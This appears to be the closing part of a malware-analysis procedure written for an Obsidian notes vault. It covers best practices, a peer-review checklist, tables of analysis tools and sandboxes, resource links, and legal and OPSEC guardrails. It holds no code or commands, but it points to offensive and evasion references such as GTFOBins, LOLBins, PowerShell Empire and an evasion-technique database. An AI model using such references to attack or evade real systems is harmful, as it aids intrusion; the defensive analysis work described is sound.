10.5 Common Pitfalls & Best Practices

❌ Common Mistakes:

• Running malware on host system (always use isolated VM)
• Uploading samples to public sandboxes (may alert adversary)
• Not taking VM snapshots before execution (cannot reproduce)
• Analyzing packed samples without unpacking (miss true behavior)
• Ignoring string encoding (miss Unicode/base64 IOCs)
• Assuming timestamps are accurate (often forged)
• Forgetting to defang IOCs in reports (accidental clicks)

✅ Best Practices:

• Always analyze in snapshottable isolated VM
• Use hash-only lookups for intelligence gathering
• Document every command and observation
• Verify all hashes before and after transfer
• Store samples in password-protected archives (password: infected)
• Use defanged IOCs in all communications
• Maintain chain of custody documentation
• Peer review findings before publishing
• Test detection rules before deployment
• Keep analysis tools updated

---

11. QA & Peer Review

Review checklist:

• Second analyst reproduces key behaviors in clean VM
• Validate all file hashes (SHA256, SHA1, MD5)
• Verify MITRE ATT&CK technique mappings
• Confirm IOC confidence ratings (High/Medium/Low)
• Test YARA/Sigma/Suricata rules against sample
• Check for false positive indicators
• Remove private/organizational data from report
• Sanitize screenshots (no usernames, hostnames, IPs)
• Verify all URLs and domains are defanged
• Spell-check and grammar review
• Final sign-off in case notebook
• Archive evidence with verified hashes

---

🔧 Appendix — Tooling Reference

Static Analysis

Tool	Use	Platform	Link
FLOSS	Obfuscated string extraction	Win/Linux/Mac	GitHub
CAPA	Capability detection	Win/Linux/Mac	GitHub
peframe	PE file inspection	Linux	GitHub
PE-bear	PE file GUI analysis	Windows	Website
pestudio	PE analysis GUI	Windows	Website
pefile	PE parsing library (Python)	Win/Linux/Mac	PyPI
TrID	File type identification	Win/Linux	Website
Detect It Easy	Packer/compiler detection	Win/Linux/Mac	GitHub
strings	Extract strings (built-in)	Linux/Mac	Built-in

Dynamic Analysis

Tool	Use	Platform	Link
Process Monitor	File/registry/network tracking	Windows	Sysinternals
System Informer	Process/memory analysis (Process Hacker successor, renamed 2022)	Windows	GitHub
Wireshark	Network traffic capture/analysis	Win/Linux/Mac	Website
TCPView	Live network connections	Windows	Sysinternals
Regshot	Registry comparison	Windows	SourceForge
Sysmon	Advanced Windows event logging	Windows	Sysinternals
Noriben	Automated Procmon analysis	Windows	GitHub

Reverse Engineering

Tool	Use	Platform	Link
IDA Pro	Disassembler/debugger (commercial)	Win/Linux/Mac	Hex-Rays
Ghidra	Disassembler/decompiler (free)	Win/Linux/Mac	NSA
x64dbg	Windows debugger	Windows	Website
OllyDbg	32-bit debugger	Windows	Website
Radare2	Reverse engineering framework	Win/Linux/Mac	Website
Binary Ninja	Disassembler/decompiler	Win/Linux/Mac	Website

Specialized Tools

Tool	Use	Platform	Link
oledump.py	Office macro extraction	Win/Linux/Mac	Didier Stevens
olevba	VBA macro analysis	Win/Linux/Mac	oletools
dnSpy	.NET decompiler/debugger	Windows	GitHub
ILSpy	.NET assembly browser	Win/Linux/Mac	GitHub
de4dot	.NET deobfuscator	Windows	GitHub
pdfid.py	PDF structure analysis	Win/Linux/Mac	Didier Stevens
pdf-parser.py	PDF object extraction	Win/Linux/Mac	Didier Stevens
PSDecode	PowerShell deobfuscator	Win/Linux/Mac	GitHub
js-beautify	JavaScript beautifier	Win/Linux/Mac	NPM
LECmd	LNK file parser	Windows	EricZimmerman

Memory Forensics

Tool	Use	Platform	Link
Volatility 3	Memory forensics framework	Win/Linux/Mac	GitHub
FTK Imager	Memory/disk acquisition	Windows	AccessData
DumpIt	Memory acquisition	Windows	Magnet Forensics
WinPMEM	Memory acquisition	Windows	GitHub

Sandboxes (Cloud)

Service	Use	Type	Link
VirusTotal	Multi-engine AV + intelligence	Free/Paid	Website
ANY.RUN	Interactive sandbox	Free/Paid	Website
Hybrid Analysis	Cloud sandbox	Free/Paid	Website
Tria.ge	Automated triage sandbox	Free/Paid	Website
Joe Sandbox	Advanced cloud sandbox	Commercial	Website

Threat Intelligence

Service	Use	Link
MalwareBazaar	Malware sample repository	abuse.ch
ThreatFox	IOC database	abuse.ch
URLhaus	Malicious URL database	abuse.ch
MalAPI.io	Windows API behavior lookup	Website
GTFOBins	Unix binaries exploit database	Website

Detection Engineering

Tool	Use	Link
YARA	Pattern matching engine	GitHub
Sigma	Generic SIEM rule format	GitHub
Suricata	Network IDS/IPS	Website
ioc-fanger	IOC defanging/fanging tool	GitHub

Analysis Distributions

Distribution	Description	Link
FlareVM	Windows malware analysis VM	GitHub
REMnux	Linux malware analysis distro	Website
SIFT Workstation	Digital forensics distro	SANS

---

📚 Additional Resources

Reference Materials

• SANS Malware Analysis Cheat Sheet: https://www.sans.org/posters/
• Practical Malware Analysis Book: https://practicalmalwareanalysis.com/
• FLARE VM Setup Guide: https://github.com/mandiant/flare-vm
• Volatility 3 Documentation: https://volatility3.readthedocs.io/
• Volatility Reference Guide: https://github.com/gl0bal01/volatility
• Volatility Windows Analysis Script: https://github.com/gl0bal01/volatility-windows-analysis
• Malware Analysis Claude Skills: https://github.com/gl0bal01/malware-analysis-claude-skills

Communities & Forums

• r/Malware (Reddit): https://www.reddit.com/r/Malware/
• MalwareTech Blog: https://www.malwaretech.com/
• Malpedia (Malware Encyclopedia): https://malpedia.caad.fkie.fraunhofer.de/

---

12. Extended Reference Resources

Comprehensive Malware Analysis Guides

• Malware Unicorn's Workshop - malwareunicorn.org
  • Reverse engineering workshops and training materials
  • x86 assembly crash course
• HackTricks - Malware Analysis - book.hacktricks.xyz/forensics/malware-analysis
  • Comprehensive malware analysis techniques
  • Static and dynamic analysis methodologies
• SANS Malware Analysis Toolkit - sans.org/tools
  • Curated malware analysis tools and techniques
• OALabs Research - penanalysis.net and their Discord
  • Malware unpacking and analysis tutorials
  • YouTube channel with detailed walkthroughs

Malware Repositories & Threat Intelligence

• MalwareBazaar - bazaar.abuse.ch
  • Malware sample sharing platform
  • API for automated lookups
• Malpedia - malpedia.caad.fkie.fraunhofer.de
  • Malware family encyclopedia
  • Detailed family profiles and IOCs
• ThreatFox - threatfox.abuse.ch
  • IOC database for malware
  • Real-time threat intelligence
• URLhaus - urlhaus.abuse.ch
  • Malicious URL tracking
• Hybrid Analysis - hybrid-analysis.com
  • Free malware analysis sandbox
• VirusTotal Graph - virustotal.com/graph
  • Visualize malware relationships

YARA Rules & Signatures

• Awesome YARA - github.com/InQuest/awesome-yara
  • Curated list of YARA resources
• YARA-Rules Repository - github.com/Yara-Rules/rules
  • Community YARA rules collection
• Neo23x0 Signature Base - github.com/Neo23x0/signature-base
  • Florian Roth's YARA and Sigma rules
• ReversingLabs YARA Rules - github.com/reversinglabs/reversinglabs-yara-rules
  • Commercial-grade YARA rules

Sandbox & Dynamic Analysis

• ANY.RUN - app.any.run
  • Interactive malware sandbox
  • Real-time analysis observation
• Tria.ge - tria.ge
  • Automated malware analysis
  • Free tier available
• Joe Sandbox - joesandbox.com
  • Advanced malware analysis sandbox
• CAPE Sandbox - github.com/kevoreilly/CAPEv2
  • Open-source malware sandbox
  • Config extractor for malware families

Reverse Engineering Resources

• Practical Malware Analysis - practicalmalwareanalysis.com
  • Classic malware analysis textbook
• Reverse Engineering for Beginners - beginners.re
  • Free book by Dennis Yurichev
• Malware Analysis for Hedgehogs (YouTube) - Colin Hardy's channel
  • Detailed malware analysis walkthroughs
• LiveOverflow Malware Series - youtube.com/LiveOverflow
  • Binary exploitation and malware analysis

Specialized Analysis Techniques

• Unpacking Malware - unprotect.it
  • Malware evasion techniques database
  • Unpacking methods and anti-analysis
• Didier Stevens Tools - blog.didierstevens.com/programs
  • PDF analysis, Office macro tools
  • oledump.py, pdfid.py, pdf-parser.py
• FLOSS Documentation - github.com/mandiant/flare-floss
  • Mandiant's obfuscated string solver
• CAPA Rules - github.com/mandiant/capa-rules
  • Capability detection rules

Memory Forensics

• Volatility Cheat Sheet - github.com/gl0bal01/volatility
  • Quick reference for Volatility commands

API & Behavior References

• MalAPI.io - malapi.io
  • Windows API calls used by malware
  • Categorized by function (persistence, evasion, etc.)
• MITRE ATT&CK - attack.mitre.org
  • Adversary tactics and techniques
• ATT&CK Navigator - mitre-attack.github.io/attack-navigator
  • Visualize ATT&CK techniques
• LOLBins - lolbas-project.github.io
  • Living Off the Land binaries (Windows)
• GTFOBins - gtfobins.github.io
  • Unix binaries for exploitation

.NET & PowerShell Analysis

• dnSpyEx - github.com/dnSpyEx/dnSpy
  • .NET debugger and decompiler (maintained fork)
• de4dot - github.com/de4dot/de4dot
  • .NET deobfuscator
• PSDecode - github.com/R3MRUM/PSDecode
  • PowerShell deobfuscation tool
• PowerShell Empire Detection - github.com/EmpireProject/Empire
  • Understanding PowerShell malware

Office & Document Malware

• oletools - github.com/decalage2/oletools
  • Python tools for malicious Office files
  • olevba, rtfobj, msodde
• XLMMacroDeobfuscator - github.com/DissectMalware/XLMMacroDeobfuscator
  • Excel 4.0 macro analysis
• VBA Stomping Detection - outflank.nl/blog
  • Understanding VBA stomping techniques

Courses & Training

• SANS FOR610 - Reverse Engineering Malware: Malware Analysis Tools and Techniques
• SANS FOR710 - Reverse Engineering Malware: Advanced Code Analysis
• TCM Security - Practical Malware Analysis & Triage - tcm-sec.com/pmat
• Malware Analysis Boot Camp (Cybrary) - cybrary.it
• eLearnSecurity Malware Analysis Professional (eCMAP)

Blogs & Research

• MalwareTech - malwaretech.com
  • Marcus Hutchins' malware research blog
• Kryptos Logic - kryptoslogic.com/blog
  • Advanced malware analysis
• Mandiant Blog - mandiant.com/resources/blog
  • APT and malware research
• Malwarebytes Labs - blog.malwarebytes.com
  • Consumer malware trends
• CERT-EU Security Advisories - cert.europa.eu
  • European CERT malware alerts

Forensics Integration

• SANS Digital Forensics Blog - sans.org/blog
• 13Cubed (YouTube) - youtube.com/c/13Cubed
  • Digital forensics and incident response
• DFIR.it - dfir.it
  • Digital forensics resources

Communities & Forums

• r/Malware - reddit.com/r/Malware
  • Malware analysis community
• r/ReverseEngineering - reddit.com/r/ReverseEngineering
  • Reverse engineering discussions
• Malware Analysis Discord - Various community servers
• Stack Overflow - Reverse Engineering - reverseengineering.stackexchange.com

Automated Analysis Platforms

• DRAKVUF Sandbox - github.com/CERT-Polska/drakvuf-sandbox
  • Agentless malware sandbox
• Noriben - github.com/Rurik/Noriben
  • Automated Procmon analysis script

---

Related SOPs

Investigations / governance:

• [[../../Investigations/Techniques/sop-legal-ethics|Legal & Ethics]] — canonical legal framework; review before every engagement
• [[../../Investigations/Techniques/sop-opsec-plan|OPSEC Plan]] — investigator OPSEC; lab isolation, attribution-tied account / network hygiene, sample-handling discipline
• [[../../Investigations/Techniques/sop-collection-log|Collection Log]] — chain-of-custody, hashing, timestamping, FRE 902(13)/(14) framing
• [[../../Investigations/Techniques/sop-sensitive-crime-intake-escalation|Sensitive Crime Intake & Escalation]] — escalation routes for CSAM payloads, terrorism funding, threat-to-life indicators

Analysis:

• [[sop-reverse-engineering|Reverse Engineering]] — disassembly, decompilation, and binary analysis
• [[sop-cryptography-analysis|Cryptography Analysis]] — analyzing encryption in malware
• [[sop-hash-generation-methods|Hash Generation Methods]] — file hashing and integrity
• [[sop-forensics-investigation|Forensics Investigation]] — post-incident host / memory / network artefact collection
• [[sop-email-bec-forensics|Email & BEC Forensics]] — email-vector / phishing-kit / attachment intake side
• [[sop-cloud-forensics|Cloud Forensics]] — cloud-pivot scenarios when malware exfiltrates to / via cloud infrastructure

Pentesting & Security:

• [[../Pentesting/sop-detection-evasion-testing|Detection Evasion Testing]] — understanding malware evasion techniques
• [[../Pentesting/sop-vulnerability-research|Vulnerability Research]] — finding vulnerabilities exploited by malware

Legal & Ethical Considerations

Canonical legal framework: see [[../../Investigations/Techniques/sop-legal-ethics|Legal & Ethics]]. Do not re-derive jurisdiction, statute, or authorization rules in this SOP — read them from the canonical source and apply.

OPSEC for the analyst (lab isolation, sample-handling discipline, network egress, attribution separation): see [[../../Investigations/Techniques/sop-opsec-plan|OPSEC Plan]]. Malware analysis leaks more than typical defensive work — sandbox detonation traffic, sample hashes pasted into VirusTotal, and lab VM telemetry can each tip a live adversary or burn a victim engagement.

Malware-analysis-specific guardrails:

• Authorization in writing. Names the malware family, the customer / victim environment, the lab perimeter, the disposition decision (analyse-only vs share / publish), and the disclosure path (CERT, ISAC, vendor, public). Sample-sharing carve-out should be explicit if the sample originates from a customer environment.
• Sample-handling discipline. Sealed transport (encrypted container with passphrase out-of-band), one-way analyst-to-lab flow, no analyst-host execution, no execution outside the isolated lab VLAN. Sample destruction policy at engagement close is documented in writing.
• No live infrastructure interaction. Do not connect to live C2, do not register sinkhole domains without coordination with the relevant CERT / vendor / law-enforcement, do not interact with the operator. Even passive DNS / WHOIS pivots from analyst infrastructure can tip the adversary; route via blind pivot ([[../../Investigations/Techniques/sop-web-dns-whois-osint|Web/DNS/WHOIS OSINT]] OPSEC).
• CSAM / illegal-content discipline. If a sample contains or fetches child sexual abuse material, terrorism material, or other content that is per-se illegal to possess in the analyst's jurisdiction: stop the engagement, preserve the sealed container without re-opening, do not extract / catalogue / share, and route via [[../../Investigations/Techniques/sop-sensitive-crime-intake-escalation|Sensitive Crime Intake & Escalation]]. Possession defences for analysts vary by jurisdiction; counsel review is mandatory before any further handling.
• VirusTotal / public-sandbox discipline. Public submission of a customer's sample exposes the engagement and can tip the adversary; treat as a customer-authorization decision, not an analyst-default action. Where authorized, submit hashes (SHA-256) before submitting the binary; use private-tier sandboxes (Joe Sandbox private, ANY.RUN private, Tria.ge enterprise) where analyst attribution / customer disclosure is the concern.
• PII minimization (GDPR / UK DPA / CCPA / sectoral). Sample artefacts (config files, captured credentials, victim-side data fragments) may contain PII. Minimize collection to the analytical purpose; document lawful basis (legitimate interest / legal claim / regulator-mandated) per artefact class. Non-customer victim PII is the highest-risk class.
• Disclosure path. Customer first, then CERT / ISAC / vendor at customer's direction. Public publication (blog, conference talk, GitHub indicator drop) is a customer decision with a documented timeline; even after "approval," scrub for victim-identifying detail and rotate IOCs that would tip an active adversary.
• Court-admissibility tradecraft. Pin tool versions; capture raw artefacts; cross-corroborate vendor classifications with at least one independent method (per §11 QA & Peer Review). Provenance chain (intake → sealed container → lab artefact → IOC → report) per [[../../Investigations/Techniques/sop-collection-log|Collection Log]].
• Mandatory reporting. If operating inside a regulated entity, route findings via the CISO / SOC manager / counsel chain. Outside, route serious findings (active CSAM distribution, terrorism funding, threat-to-life payloads, critical-infrastructure malware) via the appropriate national authority — see [[../../Investigations/Techniques/sop-sensitive-crime-intake-escalation|Sensitive Crime Intake & Escalation]].
• Log every action. Sample hash, intake timestamp UTC, lab VM ID, tool versions, action, hash of saved artefact — per [[../../Investigations/Techniques/sop-collection-log|Collection Log]] format. Admissibility depends on the unbroken chain.

---

📦 This SOP is designed for Obsidian vault integration. Link from incident case folders or use as standalone reference for malware analysis workflows.